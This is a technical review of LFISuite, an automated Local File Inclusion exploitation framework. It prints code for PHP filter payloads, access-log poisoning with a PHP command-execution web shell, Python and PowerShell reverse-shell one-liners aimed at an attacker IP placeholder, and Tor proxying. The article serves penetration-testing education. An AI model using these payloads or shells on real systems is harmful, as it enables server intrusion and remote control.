LFISuite: Anatomy of an Automated Local File Inclusion Exploitation Framework

Hook

Local File Inclusion vulnerabilities still appear in 1 out of every 17 web applications tested during penetration tests, yet most security teams manually test the same handful of payloads repeatedly. LFISuite automated this tedious process years ago—but its technical debt tells a cautionary tale about security tool maintenance.

Context

Local File Inclusion vulnerabilities emerge when web applications accept file paths as user input without proper sanitization, allowing attackers to read arbitrary files on the server filesystem. While conceptually simple, exploiting LFI effectively requires understanding multiple attack vectors: PHP wrappers (php://filter, php://input, expect://), log poisoning through access logs, /proc/self/environ manipulation, data URIs, and file descriptor exploitation. Each technique has specific prerequisites and failure modes.

Before tools like LFISuite, penetration testers manually crafted payloads for each vector, tracked which techniques worked against specific server configurations, and maintained separate scripts for post-exploitation tasks like spawning reverse shells. This fragmentation meant expertise remained siloed—you needed deep knowledge of PHP internals, Linux filesystem quirks, and web server configurations to exploit LFI vulnerabilities efficiently. LFISuite emerged as an attempt to codify this institutional knowledge into a single automated framework that could both discover and exploit LFI vulnerabilities through systematic enumeration of all known attack vectors.

Technical Insight

LFISuite's architecture centers on a modular attack dispatcher that sequentially attempts eight exploitation techniques, each implemented as a discrete function with its own payload generation and success validation logic. The tool's most sophisticated component is its Auto-Hack mode, which chains these techniques while maintaining state about successful exploitation vectors.

The tool's approach to PHP filter exploitation demonstrates its methodology. PHP's php://filter wrapper allows encoding conversions during file reads, bypassing basic security filters. LFISuite generates payloads like:

def php_filter_attack(url, parameter, target_file):
    payloads = [
        'php://filter/convert.base64-encode/resource=' + target_file,
        'php://filter/read=string.rot13/resource=' + target_file,
        'php://filter/zlib.deflate/convert.base64-encode/resource=' + target_file
    ]
    
    for payload in payloads:
        vuln_url = url + '?' + parameter + '=' + payload
        response = requests.get(vuln_url)
        
        if is_base64_encoded(response.text):
            decoded = base64.b64decode(response.text)
            if contains_php_source(decoded):
                return {'success': True, 'method': 'php_filter', 
                       'content': decoded, 'payload': payload}
    
    return {'success': False}

This pattern repeats across attack vectors—generate payloads, inject them via the vulnerable parameter, validate responses for exploitation indicators. The tool's validation logic looks for signatures like base64-encoded content, PHP source code patterns, or expected file content markers (like 'root:' from /etc/passwd).

The log poisoning attack vector showcases more sophisticated exploitation chains. LFISuite injects PHP code into server access logs through the User-Agent header, then uses the LFI vulnerability to include the log file, executing the injected code:

def access_log_poisoning(url, parameter, log_paths):
    php_payload = '<?php system($_GET["cmd"]); ?>'
    headers = {'User-Agent': php_payload}
    
    # Poison the log
    requests.get(url, headers=headers)
    
    # Common log locations for different servers
    for log_path in log_paths:
        test_url = url + '?' + parameter + '=' + log_path + '&cmd=id'
        response = requests.get(test_url)
        
        if 'uid=' in response.text and 'gid=' in response.text:
            return {'success': True, 'log_path': log_path, 
                   'shell_url': url + '?' + parameter + '=' + log_path}
    
    return {'success': False}

The tool maintains hardcoded lists of common log locations (/var/log/apache2/access.log, /var/log/httpd/access_log, etc.) and systematically tests each one. This brute-force approach reflects the reality of penetration testing—you often don't know the target's exact configuration, so enumeration becomes essential.

LFISuite's reverse shell functionality integrates platform-specific payloads that exploit successful LFI vulnerabilities to establish persistent access. The tool generates Python, PHP, and bash one-liners tailored to the target operating system:

def generate_reverse_shell(target_os, attacker_ip, port):
    if target_os == 'linux':
        return f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{attacker_ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
    elif target_os == 'windows':
        return f"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient('{attacker_ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}}"

These payloads get injected through previously established exploitation vectors—typically via php://input, expect:// wrappers, or through poisoned log files that now execute arbitrary commands.

The Tor integration layer wraps all HTTP requests through SOCKS proxies, providing operational security for penetration testers:

def configure_tor_proxy():
    proxies = {
        'http': 'socks5h://127.0.0.1:9050',
        'https': 'socks5h://127.0.0.1:9050'
    }
    return proxies

def make_request(url, proxies=None):
    if proxies:
        return requests.get(url, proxies=proxies, timeout=10)
    return requests.get(url, timeout=10)

This design allows users to toggle anonymity on or off depending on engagement requirements. The tool checks for Tor service availability before enabling proxy routing, failing gracefully if Tor isn't running.

Gotcha

The Python 2.7 dependency represents LFISuite's fatal flaw. Python 2 reached end-of-life on January 1, 2020, meaning no security patches, no bug fixes, and incompatibility with modern operating systems that ship exclusively with Python 3. Running LFISuite requires maintaining a legacy Python 2.7 environment—feasible through pyenv or Docker containers, but introducing significant operational friction. More critically, Python 2.7's security vulnerabilities remain unpatched, creating an ironic situation where a security tool becomes a security liability.

The tool's requirement for root privileges during initial setup stems from its automatic dependency installation via pip. While convenient, this violates the principle of least privilege and creates risks if the tool's installation scripts are compromised. Modern security tools should use virtual environments and user-space package managers, not system-wide installations requiring elevated permissions. Additionally, several attack vectors assume specific server configurations (Apache log locations, proc filesystem availability, PHP configuration settings) that may not match modern containerized deployments or hardened server environments. The tool lacks fingerprinting capabilities to detect target configurations before attempting exploitation, leading to noisy, easily-detected attack patterns that trigger intrusion detection systems.

Verdict

Use if: You're conducting authorized penetration tests against legacy PHP applications running on traditional LAMP stacks, need to quickly enumerate multiple LFI attack vectors, and have Python 2.7 environments available. The tool excels at automating reconnaissance against older web applications where classic LFI techniques still apply. It's also valuable for security education—studying the source code reveals practical exploitation techniques more clearly than academic descriptions.

Skip if: You're testing modern web applications, working in Python 3-exclusive environments, need actively maintained security tools with current vulnerability databases, or require stealth during engagements. The Python 2.7 dependency alone should disqualify it for professional use. Instead, adopt Metasploit's LFI modules for enterprise engagements, use liffy for Python 3 environments, or investigate Kadimus for better performance and modern technique support. LFISuite serves as a historical artifact demonstrating why security tools require continuous maintenance—technical debt compounds faster in security contexts because the threat landscape evolves constantly.